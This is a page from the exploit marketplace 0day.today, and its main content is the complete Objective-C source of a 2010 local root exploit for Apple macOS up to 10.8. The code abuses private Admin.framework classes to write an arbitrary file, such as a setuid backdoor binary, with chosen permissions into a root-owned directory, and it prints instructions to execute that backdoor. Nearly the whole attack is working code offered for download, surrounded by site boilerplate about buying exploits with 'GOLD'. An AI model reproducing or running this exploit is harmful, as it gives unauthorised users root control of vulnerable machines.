0day.today - Biggest Exploit Database in the World.

Select your language:

Things you should know about 0day.today:

We use one main domain: http://0day.today
Most of the materials is completely FREE
If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD

We accept currencies: [contact admin to find more]

We don't want you to use our site as a tool for hacking purposes, so any kind of action that could affect illegaly other users or websites that you don't have right to access will be banned and your account including your data will be destroyed.

Administration of this site uses the official contacts. Beware of impostors!

We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!

I am registered user of 0day.today. I don't want to see this screen in future.

What to do first?

Read the [ agreement ]
Read the [ Submit ] rules
Visit the [ faq ] page
[ Register ] profile
Get [ GOLD ]
If you want to [ sell ]
If you want to [ buy ]
If you lost [ Account ]
Any questions [ admin@0day.today ]

Main links

You can contact us by

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

[ authorization ] [ registration ] [ restore account ]

You can contact us by:

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

Apple MAC OS X < 10.9/10 - Local Root Exploit

Author

mu-b

Risk

[

Security Risk High

]

0day-ID

Category

Date add

Platform

/* osx-irony-assist.m
 *
 * Copyright (c) 2010 by <mu-b@digit-labs.org>
 *
 * Apple MACOS X < 10.9/10? local root exploit
 * by mu-b - June 2010
 *
 * - Tested on: Apple MACOS X <= 10.8.X
 *
 * $Id: osx-irony-assist.m 16 2015-04-10 09:34:47Z mu-b $
 *
 * The most ironic backdoor perhaps in the history of backdoors.
 * Enabling 'Assistive Devices' in the 'Universal Access' preferences pane
 * uses this technique to drop a file ("/var/db/.AccessibilityAPIEnabled")
 * in a directory,
 *
 * drwxr-xr-x  62 root       wheel      2108  9 Apr 16:23 db
 *
 * without being root, now how did you do that?
 *
 * Copy what you want, wherever you want it, with whatever permissions you
 * desire, hmmm, backdoor?
 *
 * This is now fixed, so I guess this is OK :-)
 *
 *    - Private Source Code -DO NOT DISTRIBUTE -
 * http://www.digit-labs.org/ -- Digit-Labs 2010!@$!
 */
 
#include <stdio.h>
#include <stdlib.h>
 
#import <SecurityFoundation/SFAuthorization.h>
#import <Foundation/Foundation.h>
 
/* where you want to write it! */
#define BACKDOOR_BIN  "/var/db/.AccessibilityAPIEnabled"
 
int do_assistive_copy(const char *spath, const char *dpath)
{
  NSAutoreleasePool *pool = [[NSAutoreleasePool alloc] init];
  id authenticatorInstance, *userUtilsInstance;
  Class authenticatorClass, userUtilsClass;
 
  (void) pool;
  NSBundle *adminBundle =
    [NSBundle bundleWithPath:@"/System/Library/PrivateFrameworks/Admin.framework"];
 
  authenticatorClass = [adminBundle classNamed:@"Authenticator"];
  if (!authenticatorClass)
    {
      fprintf (stderr, "* failed locating the Authenticator Class\n");
      return (EXIT_FAILURE);
    }
 
  printf ("* Found Authenticator Class!\n");
  authenticatorInstance =
    [authenticatorClass performSelector:@selector(sharedAuthenticator)];
 
  userUtilsClass = [adminBundle classNamed:@"UserUtilities"];
  if (!userUtilsClass)
    {
      fprintf (stderr, "* failed locating the UserUtilities Class\n");
      return (EXIT_FAILURE);
    }
 
  printf ("* found UserUtilities Class!\n");
  userUtilsInstance = (id *) [userUtilsClass alloc];
 
  SFAuthorization *authObj = [SFAuthorization authorization];
  OSStatus isAuthed = (OSStatus)
    [authenticatorInstance performSelector:@selector(authenticateUsingAuthorizationSync:)
                                withObject:authObj];
  printf ("* authenticateUsingAuthorizationSync:authObj returned: %i\n", isAuthed);
 
  NSData *suidBin =
    [NSData dataWithContentsOfFile:[NSString stringWithCString:spath
                                             encoding:NSASCIIStringEncoding]];
  if (!suidBin)
    {
      fprintf (stderr, "* could not create [NSDATA] suidBin!\n");
      return (EXIT_FAILURE);
    }
 
  NSDictionary *createFileWithContentsDict =
    [NSDictionary dictionaryWithObject:(id)[NSNumber numberWithShort:2377]
                                forKey:(id)NSFilePosixPermissions];
  if (!createFileWithContentsDict)
    {
      fprintf (stderr, "* could not create [NSDictionary] createFileWithContentsDict!\n");
      return (EXIT_FAILURE);
    }
 
  CFStringRef writePath =
    CFStringCreateWithCString(NULL, dpath, kCFStringEncodingMacRoman);
#pragma clang diagnostic push
#pragma clang diagnostic ignored "-Wobjc-method-access"
  [*userUtilsInstance createFileWithContents:suidBin path:writePath
                                  attributes:createFileWithContentsDict];
#pragma clang diagnostic pop
  printf ("* now execute suid backdoor at %s\n", dpath);
 
  /* send the "Distributed Object Message" to the defaultCenter,
   * is this really necessary? (not for ownage)
   */
  [[NSDistributedNotificationCenter defaultCenter]
    postNotificationName:@"com.apple.accessibility.api"
    object:@"system.preferences" userInfo:nil
    deliverImmediately:YES];
 
  return (EXIT_SUCCESS);
}
 
int main (int argc, const char * argv[])
{
 
  printf ("Apple MACOS X < 10.9/10? local root exploit\n"
          "by: <mu-b@digit-labs.org>\n"
          "http://www.digit-labs.org/ -- Digit-Labs 2010!@$!\n\n");
 
  if (argc <= 1)
    {
      fprintf (stderr, "Usage: %s <source> [destination]\n", argv[0]);
      exit (EXIT_SUCCESS);
    }
 
  return (do_assistive_copy(argv[1], argc >= 2 ? argv[2] : BACKDOOR_BIN));
}

#  0day.today [2024-11-16]  #

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

Apple MAC OS X < 10.9/10 - Local Root Exploit

Report Error

Report Error